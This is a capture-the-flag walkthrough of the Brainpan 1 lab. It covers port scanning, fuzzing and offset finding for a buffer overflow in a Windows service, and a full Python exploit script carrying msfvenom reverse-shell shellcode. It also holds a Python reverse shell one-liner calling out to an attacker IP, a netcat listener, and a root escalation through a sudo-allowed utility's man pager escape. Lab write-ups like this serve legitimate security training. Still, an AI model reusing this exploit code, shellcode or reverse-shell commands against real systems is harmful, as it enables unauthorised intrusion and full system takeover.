🧠Brainpan 1

License

The following post by anthonyjsaab is licensed under CC BY 4.0

0 - Introduction

Reverse engineer a Windows executable, find a buffer overflow and exploit it on a Linux machine.

1 - Port Scans

1a - Discovery

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -T4 -p- brainpan.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-19 19:57 EEST
Nmap scan report for brainpan.thm (10.10.62.226)
Host is up (0.097s latency).
Not shown: 65533 closed tcp ports (reset)
PORT      STATE SERVICE
9999/tcp  open  abyss
10000/tcp open  snet-sensor-mgmt
Nmap done: 1 IP address (1 host up) scanned in 383.06 seconds

1b - Service Versioning and OS Fingerprinting

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O -p9999,10000 brainpan.thm     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-19 20:10 EEST
Nmap scan report for brainpan.thm (10.10.62.226)
Host is up (0.094s latency).

PORT      STATE SERVICE VERSION
9999/tcp  open  abyss?
| fingerprint-strings: 
|   NULL: 
|     _| _| 
|     _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_| 
|     _|_| _| _| _| _| _| _| _| _| _| _| _|
|     _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
|     [________________________ WELCOME TO BRAINPAN _________________________]
|_    ENTER THE PASSWORD
10000/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.3)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: SimpleHTTP/0.6 Python/2.7.3
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.94SVN%I=7%D=5/19%Time=664A329A%P=x86_64-pc-linux-gnu%r
SF:(NULL,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|
SF:_\|\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x
SF:20\x20\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\
SF:|\x20\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\
SF:|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\
SF:|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20
SF:_\|\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x2
SF:0\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x2
SF:0\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x2
SF:0\x20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x
SF:20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x2
SF:0\x20_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPA
SF:N\x20_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTE
SF:R\x20THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n
SF:\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20>>\x20");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Android 4.1.1 (93%), Android 5.0 - 6.0.1 (Linux 3.4) (93%), Linux 2.6.32 (93%), Linux 3.0 - 3.2 (93%), Linux 3.0 - 3.5 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.70 seconds

1c - Vulners

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vulners --script-args mincvss=7.5 -p9999,10000 brainpan.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-19 20:14 EEST
Nmap scan report for brainpan.thm (10.10.62.226)
Host is up (0.12s latency).

PORT      STATE SERVICE VERSION
9999/tcp  open  abyss?
| fingerprint-strings: 
|   NULL: 
|     _| _| 
|     _|_|_| _| _|_| _|_|_| _|_|_| _|_|_| _|_|_| _|_|_| 
|     _|_| _| _| _| _| _| _| _| _| _| _| _|
|     _|_|_| _| _|_|_| _| _| _| _|_|_| _|_|_| _| _|
|     [________________________ WELCOME TO BRAINPAN _________________________]
|_    ENTER THE PASSWORD
10000/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.3)
| vulners: 
|   cpe:/a:python:simplehttpserver:0.6: 
|_    	CVE-2016-9063	7.5	https://vulners.com/cve/CVE-2016-9063
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.94SVN%I=7%D=5/19%Time=664A3369%P=x86_64-pc-linux-gnu%r
SF:(NULL,298,"_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\n_\|_\|_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|\x20\x20\x20\x20_\|_\|
SF:_\|\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x20\x20\x20_\|_\|_\|\x20\x20\x
SF:20\x20\x20\x20_\|_\|_\|\x20\x20_\|_\|_\|\x20\x20\n_\|\x20\x20\x20\x20_\
SF:|\x20\x20_\|_\|\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\
SF:|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\
SF:|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|\x20\x20\x20\x20
SF:_\|\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20_\|\x20\x20\x20\x20_\|\x2
SF:0\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x2
SF:0\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|\x20\x20\x20\x20_\|\n_\|_\|_\|\x2
SF:0\x20\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_\|_\|_\|\x20\x
SF:20_\|\x20\x20_\|\x20\x20\x20\x20_\|\x20\x20_\|_\|_\|\x20\x20\x20\x20\x2
SF:0\x20_\|_\|_\|\x20\x20_\|\x20\x20\x20\x20_\|\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20_\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20_\|\n\n\[________________________\x20WELCOME\x20TO\x20BRAINPA
SF:N\x20_________________________\]\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20ENTE
SF:R\x20THE\x20PASSWORD\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n
SF:\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20>>\x20");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.51 seconds

2 - Port 10000

2a - Manual Inspection

2b - Dirbusting

┌──(kali㉿kali)-[~]
└─$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://brainpan.thm:10000  
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://brainpan.thm:10000
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/bin                  (Status: 301) [Size: 0] [--> /bin/]
/index.html           (Status: 200) [Size: 215]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

2c - Retrieving a Windows executable

Notice that this banner is the same one we retrieved from the target machine's port 9999 (nmap output).

When debugging the program, we can discover that the password is "shitstorm", but that does not really help us:

Thus, if we can exploit a buffer overflow locally through this exe, we can do it remotely on the target machine's port 9999 as well.

3 - Developping an exploit - Buffer overflow

We will develop this exploit on a local Windows 10 x64 machine. Once functional, we will use it on the target.

3a - Fuzzing

Finding approximatively how many chars is too much chars, causing a seg fault:

#!/usr/bin/python3
import socket
from struct import pack
import time
IP = "192.168.112.129"
port = 9999

def fuzz():
	try:
		for i in range(0,1000,50):
			buffer = b"A"*i
			print("Fuzzing %s bytes" % i)
			s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
			s.connect((IP, port))
			s.send(buffer)
			s.close()
			time.sleep(2)
	except Exception as e:
		print(e)
		print("Could not establish a connection")
fuzz()

3b - Offset

Going forward, we will use x64dbg its plugin ERC.Xdbg

To know the exact offset, we will generate a non-repeating pattern using ERC and use it as payload.

#!/usr/bin/python3
import socket
from struct import pack
import time
IP = "192.168.112.129"
port = 9999

def eip_offset():
	pattern = bytes("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac" 
			"9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8" 
			"Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7A" 
			"i8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al" 
			"7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6" 
			"Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5A" 
			"r6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au" 
			"5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4" 
			"Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9" 
			 , "utf-8")
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((IP, port))
	s.send(pattern)
	s.close()
eip_offset()

To double-check that the offset is in fact 524 bytes, we use the following:

#!/usr/bin/python3
import socket
from struct import pack
import time
IP = "192.168.112.129"
port = 9999

def eip_control():
	offset = 524
	buffer = b"A"*offset
	eip = b"BBBB"
	payload = buffer + eip
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((IP, port))
	s.send(payload)
	s.close()
eip_control()

3c - Finding bad characters

We need to check what ASCII characters are problematic. We generate a list of all the possible ASCII characters using:

Then, we send it:

#!/usr/bin/python3
import socket
from struct import pack
import time
IP = "192.168.112.129"
port = 9999

def bad_chars():
	all_chars = bytes([0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07,
			    0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F,
			    0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17,
			    0x18, 0x19, 0x1A, 0x1B, 0x1C, 0x1D, 0x1E, 0x1F,
			    0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27,
			    0x28, 0x29, 0x2A, 0x2B, 0x2C, 0x2D, 0x2E, 0x2F,
			    0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37,
			    0x38, 0x39, 0x3A, 0x3B, 0x3C, 0x3D, 0x3E, 0x3F,
			    0x40, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47,
			    0x48, 0x49, 0x4A, 0x4B, 0x4C, 0x4D, 0x4E, 0x4F,
			    0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x57,
			    0x58, 0x59, 0x5A, 0x5B, 0x5C, 0x5D, 0x5E, 0x5F,
			    0x60, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67,
			    0x68, 0x69, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E, 0x6F,
			    0x70, 0x71, 0x72, 0x73, 0x74, 0x75, 0x76, 0x77,
			    0x78, 0x79, 0x7A, 0x7B, 0x7C, 0x7D, 0x7E, 0x7F,
			    0x80, 0x81, 0x82, 0x83, 0x84, 0x85, 0x86, 0x87,
			    0x88, 0x89, 0x8A, 0x8B, 0x8C, 0x8D, 0x8E, 0x8F,
			    0x90, 0x91, 0x92, 0x93, 0x94, 0x95, 0x96, 0x97,
			    0x98, 0x99, 0x9A, 0x9B, 0x9C, 0x9D, 0x9E, 0x9F,
			    0xA0, 0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6, 0xA7,
			    0xA8, 0xA9, 0xAA, 0xAB, 0xAC, 0xAD, 0xAE, 0xAF,
			    0xB0, 0xB1, 0xB2, 0xB3, 0xB4, 0xB5, 0xB6, 0xB7,
			    0xB8, 0xB9, 0xBA, 0xBB, 0xBC, 0xBD, 0xBE, 0xBF,
			    0xC0, 0xC1, 0xC2, 0xC3, 0xC4, 0xC5, 0xC6, 0xC7,
			    0xC8, 0xC9, 0xCA, 0xCB, 0xCC, 0xCD, 0xCE, 0xCF,
			    0xD0, 0xD1, 0xD2, 0xD3, 0xD4, 0xD5, 0xD6, 0xD7,
			    0xD8, 0xD9, 0xDA, 0xDB, 0xDC, 0xDD, 0xDE, 0xDF,
			    0xE0, 0xE1, 0xE2, 0xE3, 0xE4, 0xE5, 0xE6, 0xE7,
			    0xE8, 0xE9, 0xEA, 0xEB, 0xEC, 0xED, 0xEE, 0xEF,
			    0xF0, 0xF1, 0xF2, 0xF3, 0xF4, 0xF5, 0xF6, 0xF7,
			    0xF8, 0xF9, 0xFA, 0xFB, 0xFC, 0xFD, 0xFE, 0xFF])
	offset = 524
	buffer = b"A"*offset
	eip = b"B"*4
	payload = buffer + eip + all_chars
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((IP, port))
	s.send(payload)
	s.close()
bad_chars()

We should check for anomalies using the ERC command:

ERC --compare 005FF910 C:\Users\admin\Desktop\ByteArray_1.bin

Note that the address you see in the command is the value of the ESP after sending the payload.

So we found our first bad character: 0x00. Now, we replace 0x00 by 0x01 in the Python code and retry. We would see that there are no more mismatches after 0x00. So 0x00 is the only bad character.

3d - Finding a JMP ESP

3e - Exploit Code

#!/usr/bin/python3
import socket
from struct import pack
import time
IP = "192.168.112.129"
port = 9999

def exploit():
	# msfvenom -p 'windows/shell_reverse_tcp' LHOST=192.168.112.128 LPORT=5555 -f 'python' -b '\x00'
	buf =  b""
	buf += b"\xd9\xce\xb8\xa5\xd4\x2f\x7d\xd9\x74\x24\xf4\x5b"
	buf += b"\x29\xc9\xb1\x52\x31\x43\x17\x03\x43\x17\x83\x66"
	buf += b"\xd0\xcd\x88\x94\x31\x93\x73\x64\xc2\xf4\xfa\x81"
	buf += b"\xf3\x34\x98\xc2\xa4\x84\xea\x86\x48\x6e\xbe\x32"
	buf += b"\xda\x02\x17\x35\x6b\xa8\x41\x78\x6c\x81\xb2\x1b"
	buf += b"\xee\xd8\xe6\xfb\xcf\x12\xfb\xfa\x08\x4e\xf6\xae"
	buf += b"\xc1\x04\xa5\x5e\x65\x50\x76\xd5\x35\x74\xfe\x0a"
	buf += b"\x8d\x77\x2f\x9d\x85\x21\xef\x1c\x49\x5a\xa6\x06"
	buf += b"\x8e\x67\x70\xbd\x64\x13\x83\x17\xb5\xdc\x28\x56"
	buf += b"\x79\x2f\x30\x9f\xbe\xd0\x47\xe9\xbc\x6d\x50\x2e"
	buf += b"\xbe\xa9\xd5\xb4\x18\x39\x4d\x10\x98\xee\x08\xd3"
	buf += b"\x96\x5b\x5e\xbb\xba\x5a\xb3\xb0\xc7\xd7\x32\x16"
	buf += b"\x4e\xa3\x10\xb2\x0a\x77\x38\xe3\xf6\xd6\x45\xf3"
	buf += b"\x58\x86\xe3\x78\x74\xd3\x99\x23\x11\x10\x90\xdb"
	buf += b"\xe1\x3e\xa3\xa8\xd3\xe1\x1f\x26\x58\x69\x86\xb1"
	buf += b"\x9f\x40\x7e\x2d\x5e\x6b\x7f\x64\xa5\x3f\x2f\x1e"
	buf += b"\x0c\x40\xa4\xde\xb1\x95\x6b\x8e\x1d\x46\xcc\x7e"
	buf += b"\xde\x36\xa4\x94\xd1\x69\xd4\x97\x3b\x02\x7f\x62"
	buf += b"\xac\xed\x28\x1c\xac\x86\x2a\xdc\xb9\xe5\xa2\x3a"
	buf += b"\xab\x19\xe3\x95\x44\x83\xae\x6d\xf4\x4c\x65\x08"
	buf += b"\x36\xc6\x8a\xed\xf9\x2f\xe6\xfd\x6e\xc0\xbd\x5f"
	buf += b"\x38\xdf\x6b\xf7\xa6\x72\xf0\x07\xa0\x6e\xaf\x50"
	buf += b"\xe5\x41\xa6\x34\x1b\xfb\x10\x2a\xe6\x9d\x5b\xee"
	buf += b"\x3d\x5e\x65\xef\xb0\xda\x41\xff\x0c\xe2\xcd\xab"
	buf += b"\xc0\xb5\x9b\x05\xa7\x6f\x6a\xff\x71\xc3\x24\x97"
	buf += b"\x04\x2f\xf7\xe1\x08\x7a\x81\x0d\xb8\xd3\xd4\x32"
	buf += b"\x75\xb4\xd0\x4b\x6b\x24\x1e\x86\x2f\x54\x55\x8a"
	buf += b"\x06\xfd\x30\x5f\x1b\x60\xc3\x8a\x58\x9d\x40\x3e"
	buf += b"\x21\x5a\x58\x4b\x24\x26\xde\xa0\x54\x37\x8b\xc6"
	buf += b"\xcb\x38\x9e"
	offset = 524
	buffer = b"A"*offset
	eip = pack('<L', 0x311712F3)
	nop = b"\x90"*32
	payload = buffer + eip + nop + buf
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((IP, port))
	s.send(payload)
	s.close()
exploit()

3f - Actual Foothold

Using the same Python exploit code, but changing the shell code and the target IP, we get a reverse shell:

4 - PrivEsc

4a - Upgrade shell

Even tho a Windows executable is running on the target machine, the target machine is a Linux machine. We should get a decent bash shell to continue:

Z:\home\puck>/bin/sh

Z:\home\puck>sh: turning off NDELAY mode
whoami
puck
uname -a
Linux brainpan 3.5.0-25-generic #39-Ubuntu SMP Mon Feb 25 19:02:34 UTC 2013 i686 i686 i686 GNU/Linux
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("10.11.85.12",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'

┌──(kali㉿kali)-[~]
└─$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.11.85.12] from (UNKNOWN) [10.10.219.171] 52729
$ python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"
puck@brainpan:~$

4b - Abusing sudo

puck@brainpan:~$ sudo -l
sudo -l
Matching Defaults entries for puck on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User puck may run the following commands on this host:
    (root) NOPASSWD: /home/anansi/bin/anansi_util
puck@brainpan:~$ sudo /home/anansi/bin/anansi_util
sudo /home/anansi/bin/anansi_util
Usage: /home/anansi/bin/anansi_util [action]
Where [action] is one of:
  - network
  - proclist
  - manual [command]
puck@brainpan:~$ sudo /home/anansi/bin/anansi_util manual echo
sudo /home/anansi/bin/anansi_util manual echo
No manual entry for manual
WARNING: terminal is not fully functional
-  (press RETURN)!bash
!bash
root@brainpan:/usr/share/man# whoami
whoami
root
root@brainpan:/usr/share/man# id
id
uid=0(root) gid=0(root) groups=0(root)

PreviousBacktrack NextCapture!

Last updated 1 year ago

hashtagLicense

hashtag0 - Introduction

hashtag1 - Port Scans

hashtag1a - Discovery

hashtag1b - Service Versioning and OS Fingerprinting

hashtag1c - Vulners

hashtag2 - Port 10000

hashtag2a - Manual Inspection

hashtag2b - Dirbusting

hashtag2c - Retrieving a Windows executable

hashtag3 - Developping an exploit - Buffer overflow

hashtag3a - Fuzzing

hashtag3b - Offset

hashtag3c - Finding bad characters

hashtag3d - Finding a JMP ESP

hashtag3e - Exploit Code

hashtag3f - Actual Foothold

hashtag4 - PrivEsc

hashtag4a - Upgrade shell

hashtag4b - Abusing sudo